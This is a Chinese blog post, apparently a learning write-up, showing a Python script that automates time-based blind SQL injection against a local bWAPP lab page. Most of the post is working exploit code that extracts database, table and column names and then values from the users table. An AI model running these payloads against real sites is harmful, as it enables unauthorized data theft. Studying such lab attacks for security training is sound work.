sql注入——时间盲注自动化注入脚本

已于 2023-05-14 14:28:15 修改
阅读量681 收藏 5
点赞数 4
文章标签: sql 自动化 php
于 2023-05-14 14:06:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74447851/article/details/130668281
版权

目录

一、准备步骤

二、获取数据库名

三、获取表的名称

四、获取字段的名称

五、获取值

六、主体内容

因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正

一、准备步骤

在注入前,将相关信息放入HEADER和BASE_URL中,在这里使用的是phpstudy搭建的bwapp靶场环境中的SQL-Injection-Blind-Time-Base环境,注意在BASE_URL中要放入正确的参数,如此靶场的title=Iron Man'

    # 将网页的cookie放入HEADER中
    HEADER = {
        "cookie": "security_level=0; PHPSESSID=d3hp609rbv7fc8gelnlptudth6"
    }
    # 将传参前的URL放到BASE_URL中
    BASE_URL = "http://www.demo.com/bc/bwapp/sqli_15.php?title=Iron Man' "

二、获取数据库名

在这里使用‘and length(database())={} and sleep(2) -- 注入语句查询长度,and ascii(substr(database(),{},1))={} and sleep(2) -- 注入语句找到每一个字符,并且返回

# 获取数据库名的长度
def get_database_name_length() -> int:
    count = 0
    for i in range(30):
        url = BASE_URL + "and length(database())={} and sleep(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 2:
            print("长度为{}".format(i))
            count = i
    return count


# 获取数据库的名称
def get_database_name(count):
    name = ''
    for i in range(count + 1):
        for j in range(33, 127):
            url = BASE_URL + "and ascii(substr(database(),{},1))={} and sleep(2) -- &action=search".format(
                i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                name = name+chr(j)
                print("=========读取第{}个字符==========".format(i))
    print("数据库名称:"+name)

 运行该部分的代码,最终的结果会显示如下

三、获取表的名称

# 获取数据库里有多少表
def get_table_count() -> int:
    count = 0
    for i in range(30):
        url = BASE_URL + "and (select count(table_name)from information_schema.tables where table_schema=database())={} and sleep(2) -- &action=search".format(
            i)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 2:
            print("有{}张表".format(i))
            count = i
    return count


# 获取每个表的长度
def get_table_length_of_each_table(count):
    for i in range(count + 1):
        for j in range(30):
            url = BASE_URL + "and (select length(table_name)from information_schema.tables where table_schema=database() limit {},1)={} and sleep(2) -- &action=search".format(
                i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print("=" * 20)
                print("表{}长度为:{}".format(i+1, j))
                get_table_name_of_each_table(i, j)
                print("=" * 20)


# 获取表名
def get_table_name_of_each_table(index, count):
    result = ''
    for i in range(count+1):
        for j in range(33, 127):
            url = BASE_URL+"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={} and sleep(2) -- &action=search".format(
                index, i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                result = result+chr(j)
                print("=====读取第{}个字符=====".format(i))
    print("表{}的名称为:".format(index+1)+result)

运行该部分的代码结果如下:

 

长度关系仅放两张结果 

将观察到的有利用价值的表放到table_name参数中

四、获取字段的名称

# 获取字段个数
def get_column_count(table_name) -> int:
    count = 0
    for i in range(30):
        url = BASE_URL + "and (select count(column_name)from information_schema.columns where table_name='{}')={} and sleep(2) -- &action=search".format(table_name,
            i)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 2:
            print("共发现{}个字段".format(i))
            count = i
    return count


# 获取每个字段长度
def get_column_length_of_each_table(table_name, count):
    for i in range(count + 1):
        for j in range(30):
            url = BASE_URL + "and (select length(column_name)from information_schema.columns where table_name='{}' limit {},1)={} and sleep(2) -- &action=search".format(table_name,
                i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print("=" * 20)
                print("字段{}长度为:{}".format(i+1, j))
                get_column_name_of_each_table(table_name, i, j)
                print("=" * 20)


# 得到每个字段名称
def get_column_name_of_each_table(table_name, index,count):
    result = ''
    for i in range(count+1):
        for j in range(33, 127):
            url = BASE_URL+"and ascii(substr((select column_name from information_schema.columns where table_name='{}' limit {},1),{},1))={} and sleep(2) -- &action=search".format(table_name,
                index, i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                result = result+chr(j)
                print("=====读取第{}个字符=====".format(i))
    print("第{}个字段的名称为:".format(index + 1) + result)

运行该部分代码结果如下:

 

 将可疑的字段放到column_name参数中

五、获取值

# 获取值的个数
def get_value_count(table_name, column_name) -> int:
    count = 0
    for i in range(50):
        url = BASE_URL + "and (select count({}) from {})={} and sleep(2) -- &action=search".format(column_name, table_name, i)
        start_time = time.time()
        requests.get(url, headers=HEADER)
        if time.time() - start_time > 2:
            print("共有{}个值".format(i))
            count = i
    return count


# 获取每个值的位数
def get_value_length_of_each_table(table_name, column_name, count):
    for i in range(count + 1):
        for j in range(50):
            url = BASE_URL + "and (select length({}) from {} limit {},1)={} and sleep(2) -- &action=search".format(column_name,table_name,
                i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print("=" * 20)
                print("值的长度为:{}".format(j))
                get_value_name_of_each_table(table_name, column_name, i, j)
                print("=" * 20)


# 获取值
def get_value_name_of_each_table(table_name, column_name, index, count):
    result = ''
    for i in range(count+1):
        for j in range(33, 127):
            url = BASE_URL+"and ascii(substr((select {} from {} limit {},1),{},1))={} and sleep(2) -- &action=search".format(
                column_name, table_name, index, i, j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                result = result + chr(j)
                print("=====读取第{}个字符=====".format(i))
    print("第{}个值的内容为:".format(index + 1) + result)

该段代码运行结果如下:

 

 

六、主体内容

if __name__ == '__main__':
    # 将网页的cookie放入HEADER中
    HEADER = {
        "cookie": "security_level=0; PHPSESSID=d3hp609rbv7fc8gelnlptudth6"
    }
    # 将传参前的URL放到BASE_URL中
    BASE_URL = "http://www.demo.com/bc/bwapp/sqli_15.php?title=Iron Man' "

    # 1.获取数据库的名称
    # get_database_name(get_database_name_length())

    # 2.获取表的名称
    # get_table_length_of_each_table(get_table_count())

    # 3.获取字段的名称
    table_name ='users'
    # get_column_length_of_each_table(table_name, get_column_count(table_name))

    # 4.获取值
    column_name = 'login'
    # get_value_length_of_each_table(table_name, column_name, get_value_count(table_name, column_name))

具体的文件可以私信我拿取

栉风沐雪
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本。布尔盲注 延时注入
基于python的sql注入脚本
03-04
适合刚学python和sql注入的人 import urllib2 import re
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
2301_82244514的博客
04-30 383
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
python实现sql注入脚本
czx1234566的博客
11-30 1721
根据dblen这个变量的不断变化,然后用这不断变化返回值了一个if判断去判断是否有这个返回值里是否有“You are in...........”字符串。之后的爆表名,列名,字段等,都类似,该下payload就行了,还有这个i的值是可以变的,如果不知道表名的长度,就给i的值的范围给大一点。这个原理同刚刚所说,只是换了个payload,i是用来代表数据库的长度。输入id=1,这个返回的是正确的页面咯,那来看看错误的。然后我们就以这个为特征,围绕着这个去脚本。个人认为就是找特征,围绕着这个特征去脚本
SQL注入盲注(小白的学习)
lgsyydsa的博客
06-04 575
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
SQL盲注及python脚本
nobugnomoney的博客
05-18 3465
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3424
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
SQL时间盲注python脚本
来到了学渣的博客
03-28 4729
环境 Sql-lib靶机 Python3.8 Request、time库 分析 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22--+ 无触发,用时182毫秒 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22%20and%20sleep(3)%20--+ 用时3.14秒 ...
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本
weixin_45116657的博客
08-25 4551
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
SQL注入之基于布尔的盲注详解
09-10
在实际操作中,由于手动进行布尔型盲注非常耗时,通常会编自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
基于Python的自动化SQL注入工具开发
04-29
随着全球信息化大局的全面铺开,全世界生产力和社会经济的发展都越来越离 不开互联网,大到国家,小到组织和个人,都已经习惯了享受互联网为我们带来的 便利。然而,纷繁复杂的互联网应用背后却暗藏着巨大的安全隐患...
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
自动化SQL注入和数据库接管工具使用说明
最新发布
06-26
SQLmap是一个功能强大的自动化SQL注入工具,主要用于扫描、发现并利用给定的URL中的SQL注入漏洞。以下是关于SQLmap工具的使用简介: 一、主要功能 1. 扫描、发现并利用SQL注入漏洞:SQLmap能够自动化地检测目标URL...
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap支持多种SQL注入技术,包括但不限于盲注时间注入、错误注入、联合查询注入等。它能自动识别注入点,检测数据库类型,并尝试枚举数据库结构、表名和列名,甚至执行自定义SQL查询。此外,SQLMap还支持多种...
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1365
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编脚本注入
SQL注入-时间盲注
acepanhuan的博客
02-11 2664
SQL注入盲注学习
使用python脚本时间盲注完整步骤
wutiangui的博客
09-30 492
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based。tips:title=,&action=search需要使用burp抓包获得。我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名。
sql盲注python脚本
weixin_48266255的博客
08-29 451
【代码】sql盲注python脚本
SQL注入布尔盲注
qq_45557130的博客
10-04 747
sql注入布尔盲注
SQL注入SQL盲注的区别
04-07
SQL注入SQL盲注都是常见的安全漏洞,但它们有一些区别。 SQL注入是指攻击者通过在用户输入的数据中插入恶意的SQL代码,从而绕过应用程序的输入验证,进而执行非授权的数据库操作。攻击者可以通过SQL注入获取、修改或删除数据库中的数据,甚至执行任意的系统命令。SQL注入通常发生在应用程序与数据库之间的交互过程中。 SQL盲注是一种更加隐蔽的攻击方式,攻击者无法直接获取数据库的具体信息,而是通过不断尝试和推断来获取数据。SQL盲注通常发生在应用程序对用户输入进行了过滤或转义处理的情况下。攻击者通过构造特定的SQL语句,根据应用程序返回的不同响应结果来推断出数据库中的信息。 总结一下: - SQL注入是通过插入恶意SQL代码来执行非授权的数据库操作。 - SQL盲注是通过不断尝试和推断来获取数据库中的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

栉风沐雪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值